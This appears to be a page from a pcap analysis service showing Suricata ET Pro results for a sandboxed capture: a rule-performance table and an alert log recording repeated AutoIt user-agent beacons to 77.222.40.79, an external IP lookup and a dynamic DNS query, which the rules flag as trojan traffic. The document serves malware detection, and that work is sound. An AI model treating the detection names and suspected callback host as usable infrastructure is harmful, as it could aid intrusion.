Filename: b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 23.0604419708 seconds
Hash: 04c847a258b82858fa76434ef9233177
Uploaded: 1564034233

Logfiles


suricata-4.0.0-etpro-all-perf.txt-2019-07-25-T-05-57-36-07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap.txt - (29270 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 7/25/2019 -- 05:57:36. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2806132      1        3        6484730      1.52   52       0        4010922     124706.35   0.00        124706.35  
  2        2809511      1        4        6066778      1.42   104      0        588558      58334.40    0.00        58334.40   
  3        2805348      1        4        1554596      0.36   13       0        514142      119584.31   0.00        119584.31  
  4        2807970      1        8        6763204      1.58   104      0        355064      65030.81    0.00        65030.81   
  5        2826256      1        2        3983108      0.93   105      0        295552      37934.36    0.00        37934.36   
  6        2803740      1        4        3264342      0.76   53       0        247724      61591.36    0.00        61591.36   
  7        2809363      1        3        6639666      1.55   104      0        175520      63842.94    0.00        63842.94   
  8        2810276      1        6        9205514      2.16   104      0        170686      88514.56    0.00        88514.56   
  9        2020370      1        4        157180       0.04   1        0        157180      157180.00   0.00        157180.00  
  10       2821569      1        7        5503666      1.29   104      0        152110      52919.87    0.00        52919.87   
  11       2819993      1        2        4149202      0.97   52       0        152046      79792.35    0.00        79792.35   
  12       2810152      1        2        4195062      0.98   53       0        148868      79152.11    0.00        79152.11   
  13       2809715      1        2        3690426      0.86   53       0        148752      69630.68    0.00        69630.68   
  14       2812433      1        2        5454602      1.28   104      0        147054      52448.10    0.00        52448.10   
  15       2815340      1        2        3709692      0.87   53       0        146006      69994.19    0.00        69994.19   
  16       2830346      1        2        3204590      0.75   53       0        142736      60463.96    0.00        60463.96   
  17       2814883      1        3        3799486      0.89   52       0        142524      73067.04    0.00        73067.04   
  18       2815364      1        2        5539064      1.30   104      0        140718      53260.23    0.00        53260.23   
  19       2017261      1        3        6489840      1.52   104      0        134874      62402.31    0.00        62402.31   
  20       2830122      1        2        2651386      0.62   53       0        127226      50026.15    0.00        50026.15   
  21       2017259      1        12       4253056      1.00   52       0        126310      81789.54    0.00        81789.54   
  22       2810991      1        4        4136144      0.97   52       0        123368      79541.23    0.00        79541.23   
  23       2823858      1        3        5337982      1.25   104      0        121158      51326.75    0.00        51326.75   
  24       2829644      1        1        2551940      0.60   52       0        120958      49075.77    0.00        49075.77   
  25       2828986      1        2        6078532      1.42   105      0        113810      57890.78    0.00        57890.78   
  26       2827279      1        5        7137380      1.67   105      0        113344      67975.05    0.00        67975.05   
  27       2829848      1        2        6010498      1.41   105      0        112348      57242.84    0.00        57242.84   
  28       2816356      1        2        3122240      0.73   52       0        111796      60043.08    0.00        60043.08   
  29       2019935      1        3        2569564      0.60   53       0        110620      48482.34    0.00        48482.34   
  30       2816165      1        5        4877748      1.14   105      0        110136      46454.74    0.00        46454.74   
  31       2810148      1        2        4189882      0.98   53       0        108238      79054.38    0.00        79054.38   
  32       2819850      1        2        4153642      0.97   53       0        107302      78370.60    0.00        78370.60   
  33       2804610      1        2        2557864      0.60   53       0        104890      48261.58    0.00        48261.58   
  34       2825675      1        3        4102708      0.96   53       0        103640      77409.58    0.00        77409.58   
  35       2022901      1        2        6380834      1.49   104      0        102506      61354.17    0.00        61354.17   
  36       2828008      1        2        6816926      1.60   105      0        101250      64923.10    0.00        64923.10   
  37       2021418      1        9        6366392      1.49   104      0        100976      61215.31    0.00        61215.31   
  38       2821561      1        2        4049158      0.95   52       0        99978       77868.42    0.00        77868.42   
  39       2019094      1        5        6541990      1.53   104      0        98728       62903.75    0.00        62903.75   
  40       2821471      1        2        6386604      1.50   104      0        97810       61409.65    0.00        61409.65   
  41       2814061      1        2        3660842      0.86   53       0        96484       69072.49    0.00        69072.49   
  42       2815568      1        2        5263034      1.23   104      0        91218       50606.10    0.00        50606.10   
  43       2021413      1        2        6355504      1.49   104      0        89840       61110.62    0.00        61110.62   
  44       2819671      1        3        3029502      0.71   53       0        89308       57160.42    0.00        57160.42   
  45       2809677      1        2        3042718      0.71   53       0        88350       57409.77    0.00        57409.77   
  46       2008350      1        7        2805124      0.66   53       53       87432       52926.87    52926.87    0.00       
  47       2827883      1        2        3066172      0.72   52       0        86886       58964.85    0.00        58964.85   
  48       2815033      1        2        2000086      0.47   52       0        85488       38463.19    0.00        38463.19   
  49       2826615      1        2        3017792      0.71   53       0        85332       56939.47    0.00        56939.47   
  50       2001891      1        19       2518090      0.59   52       52       85258       48424.81    48424.81    0.00       
  51       2020181      1        8        5306976      1.24   104      0        85236       51028.62    0.00        51028.62   
  52       2805801      1        2        3066296      0.72   53       0        85094       57854.64    0.00        57854.64   
  53       2015877      1        6        4843478      1.13   104      0        84032       46571.90    0.00        46571.90   
  54       2025162      1        2        2551936      0.60   52       0        82420       49075.69    0.00        49075.69   
  55       2807793      1        4        4715748      1.10   104      0        81654       45343.73    0.00        45343.73   
  56       2811669      1        2        3441354      0.81   53       0        81446       64931.21    0.00        64931.21   
  57       2820517      1        2        2603070      0.61   53       0        80356       49114.53    0.00        49114.53   
  58       2830124      1        1        3038256      0.71   52       0        79804       58428.00    0.00        58428.00   
  59       2014405      1        10       5030176      1.18   104      0        79602       48367.08    0.00        48367.08   
  60       2828060      1        4        5011222      1.17   105      0        78816       47725.92    0.00        47725.92   
  61       2828314      1        4        2459784      0.58   52       0        78348       47303.54    0.00        47303.54   
  62       2016411      1        3        2940370      0.69   52       0        78342       56545.58    0.00        56545.58   
  63       2012649      1        5        4846504      1.13   104      0        78242       46601.00    0.00        46601.00   
  64       2823166      1        3        4786028      1.12   105      0        76898       45581.22    0.00        45581.22   
  65       2814622      1        2        2523564      0.59   53       0        75132       47614.42    0.00        47614.42   
  66       2016537      1        2        1312150      0.31   53       0        74844       24757.55    0.00        24757.55   
  67       2816055      1        2        2507210      0.59   52       0        74178       48215.58    0.00        48215.58   
  68       2809267      1        8        1927878      0.45   52       0        73900       37074.58    0.00        37074.58   
  69       2828876      1        1        1153960      0.27   210      0        73710       5495.05     0.00        5495.05    
  70       2825067      1        2        2482312      0.58   52       0        72890       47736.77    0.00        47736.77   
  71       2827580      1        7        2440980      0.57   52       0        70852       46941.92    0.00        46941.92   
  72       2012612      1        16       2517876      0.59   53       0        70800       47507.09    0.00        47507.09   
  73       2021038      1        4        2532296      0.59   52       0        70134       48698.00    0.00        48698.00   
  74       2828198      1        2        1887812      0.44   52       0        70036       36304.08    0.00        36304.08   
  75       2017948      1        2        5188750      1.22   104      0        69936       49891.83    0.00        49891.83   
  76       2017552      1        6        4878176      1.14   158      0        69860       30874.53    0.00        30874.53   
  77       2810919      1        2        2616602      0.61   53       0        69702       49369.85    0.00        49369.85   
  78       2014967      1        3        3636074      0.85   104      0        69132       34962.25    0.00        34962.25   
  79       2826203      1        2        2483238      0.58   53       0        68742       46853.55    0.00        46853.55   
  80       2830267      1        2        2525826      0.59   53       0        68206       47657.09    0.00        47657.09   
  81       2822601      1        4        1919120      0.45   52       0        67500       36906.15    0.00        36906.15   
  82       2806883      1        7        2476586      0.58   53       0        67442       46728.04    0.00        46728.04   
  83       2806414      1        5        2459276      0.58   52       0        66992       47293.77    0.00        47293.77   
  84       2804272      1        3        2519530      0.59   53       0        66098       47538.30    0.00        47538.30   
  85       2806659      1        4        65708        0.02   1        0        65708       65708.00    0.00        65708.00   
  86       2819823      1        5        2043930      0.48   52       0        64770       39306.35    0.00        39306.35   
  87       2802876      1        3        1941454      0.45   105      0        64576       18490.04    0.00        18490.04   
  88       2821615      1        2        2429990      0.57   52       0        64342       46730.58    0.00        46730.58   
  89       2023481      1        2        1967216      0.46   52       0        64228       37831.08    0.00        37831.08   
  90       2822109      1        2        1871394      0.44   52       0        64218       35988.35    0.00        35988.35   
  91       2020886      1        4        63900        0.01   1        0        63900       63900.00    0.00        63900.00   
  92       2804995      1        2        2392578      0.56   53       0        63876       45142.98    0.00        45142.98   
  93       2816899      1        2        3679272      0.86   104      0        61944       35377.62    0.00        35377.62   
  94       2025180      1        1        1809116      0.42   52       0        61000       34790.69    0.00        34790.69   
  95       2827168      1        3        1956340      0.46   52       0        60796       37621.92    0.00        37621.92   
  96       2830035      1        2        1910818      0.45   52       0        60288       36746.50    0.00        36746.50   
  97       2014380      1        4        3200074      0.75   104      0        60072       30769.94    0.00        30769.94   
  98       2024513      1        5        1638666      0.38   105      0        59198       15606.34    0.00        15606.34   
  99       2828166      1        2        1897250      0.44   52       0        58982       36485.58    0.00        36485.58   
  100      2828212      1        2        1916204      0.45   52       0        58956       36850.08    0.00        36850.08   
  101      2824398      1        2        1889332      0.44   52       0        58612       36333.31    0.00        36333.31   
  102      2829607      1        1        1903854      0.45   52       0        57970       36612.58    0.00        36612.58   
  103      2820809      1        2        1849422      0.43   52       0        57726       35565.81    0.00        35565.81   
  104      2016706      1        20       3595282      0.84   104      0        56840       34570.02    0.00        34570.02   
  105      2009702      1        5        199932       0.05   8        0        56422       24991.50    0.00        24991.50   
  106      2022973      1        1        56328        0.01   1        0        56328       56328.00    0.00        56328.00   
  107      2819785      1        2        1896430      0.44   52       0        55646       36469.81    0.00        36469.81   
  108      2803902      1        3        1962320      0.46   52       0        55192       37736.92    0.00        37736.92   
  109      2824808      1        2        1830684      0.43   52       0        55102       35205.46    0.00        35205.46   
  110      2024606      1        2        3531446      0.83   104      0        54840       33956.21    0.00        33956.21   
  111      2016809      1        5        3515440      0.82   104      0        54584       33802.31    0.00        33802.31   
  112      2823488      1        2        1848654      0.43   52       0        54482       35551.04    0.00        35551.04   
  113      2816669      1        4        1868398      0.44   52       0        54378       35930.73    0.00        35930.73   
  114      2815824      1        2        1589640      0.37   104      0        54278       15285.00    0.00        15285.00   
  115      2022502      1        4        1876926      0.44   52       0        53830       36094.73    0.00        36094.73   
  116      2024573      1        2        1823160      0.43   52       0        53770       35060.77    0.00        35060.77   
  117      2020937      1        2        1800364      0.42   52       0        51640       34622.38    0.00        34622.38   
  118      2820696      1        2        1845084      0.43   52       0        50996       35482.38    0.00        35482.38   
  119      2024771      1        1        45958        0.01   1        0        45958       45958.00    0.00        45958.00   
  120      2012328      1        6        93472        0.02   4        0        45220       23368.00    0.00        23368.00   
  121      2823937      1        13       1524416      0.36   105      0        44944       14518.25    0.00        14518.25   
  122      2013097      1        8        44766        0.01   1        0        44766       44766.00    0.00        44766.00   
  123      2014363      1        7        90080        0.02   4        0        44714       22520.00    0.00        22520.00   
  124      2014091      1        3        44672        0.01   1        0        44672       44672.00    0.00        44672.00   
  125      2021584      1        4        5

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-alert-2019-07-25-T-05-57-36-07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap.txt - (22759 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
13.138205  [**] [1:2012758:5] ET INFO DYNAMIC_DNS Query to *.dyndns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 10.0.2.15:1031 -> 10.0.2.2:53
13.314552  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1049 -> 162.88.100.200:80
13.314552  [**] [1:2021378:3] ET POLICY External IP Lookup - checkip.dyndns.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1049 -> 162.88.100.200:80
13.314748  [**] [1:2014932:2] ET POLICY DynDNS CheckIp External IP Address Server Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 162.88.100.200:80 -> 10.0.2.15:1049
13.412598  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1050 -> 77.222.40.79:80
14.620642  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1052 -> 77.222.40.79:80
14.646940  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
15.770291  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1053 -> 77.222.40.79:80
15.849267  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
16.920778  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1054 -> 77.222.40.79:80
16.950426  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
18.071608  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1055 -> 77.222.40.79:80
18.152307  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
19.213534  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1056 -> 77.222.40.79:80
19.253791  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
20.367132  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1057 -> 77.222.40.79:80
20.455995  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
21.516866  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1058 -> 77.222.40.79:80
21.557473  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
22.659739  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1059 -> 77.222.40.79:80
22.759212  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
23.812362  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1060 -> 77.222.40.79:80
23.860907  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
24.961364  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1061 -> 77.222.40.79:80
25.062181  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
26.104873  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1062 -> 77.222.40.79:80
26.163529  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
27.256896  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1063 -> 77.222.40.79:80
27.265093  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
28.407360  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1064 -> 77.222.40.79:80
28.467372  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
29.559730  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1065 -> 77.222.40.79:80
29.568936  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
30.710893  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1066 -> 77.222.40.79:80
30.770551  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
31.864355  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1067 -> 77.222.40.79:80
31.872231  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
33.015830  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1068 -> 77.222.40.79:80
33.073690  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
34.164602  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1069 -> 77.222.40.79:80
34.175285  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
35.307770  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1070 -> 77.222.40.79:80
35.377315  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
36.459809  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1071 -> 77.222.40.79:80
36.478401  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
37.612759  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1072 -> 77.222.40.79:80
37.680441  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
38.764272  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1073 -> 77.222.40.79:80
38.781995  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
39.914777  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1074 -> 77.222.40.79:80
39.983562  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
41.067883  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1075 -> 77.222.40.79:80
41.085153  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
42.217641  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1076 -> 77.222.40.79:80
42.287264  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
43.371625  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1077 -> 77.222.40.79:80
43.388387  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
44.521089  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1078 -> 77.222.40.79:80
44.590004  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
45.671105  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1079 -> 77.222.40.79:80
45.692183  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
46.815588  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1080 -> 77.222.40.79:80
46.893674  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
47.967751  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1081 -> 77.222.40.79:80
47.995188  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
49.117475  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1082 -> 77.222.40.79:80
49.197159  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
50.269818  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1083 -> 77.222.40.79:80
50.298744  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
51.423950  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1084 -> 77.222.40.79:80
51.500352  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
52.568171  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1085 -> 77.222.40.79:80
52.601664  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
53.712065  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1086 -> 77.222.40.79:80
53.803786  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
54.854062  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1087 -> 77.222.40.79:80
54.905307  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
55.993549  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1088 -> 77.222.40.79:80
56.007083  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
57.137112

This file has been truncated. Go here to download in full.


packet_stats.log - (16402 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
